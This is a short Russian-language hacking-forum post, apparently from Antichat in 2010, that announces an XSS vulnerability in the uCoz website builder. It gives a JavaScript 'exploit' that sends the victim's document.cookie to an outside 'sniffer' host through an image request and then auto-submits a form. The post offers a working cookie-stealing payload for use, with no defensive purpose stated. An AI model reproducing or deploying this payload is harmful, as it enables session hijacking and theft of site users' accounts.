26.08.2010, 17:32
|
|
Новичок
Регистрация: 25.08.2010
Сообщений: 3
Провел на форуме:
546
Репутация:
0
|
|
Программа: Ucoz
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
Код:
img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;
document.main.submit();
____________________________________
(C) %R00tKit% специально для Античата
|
|
|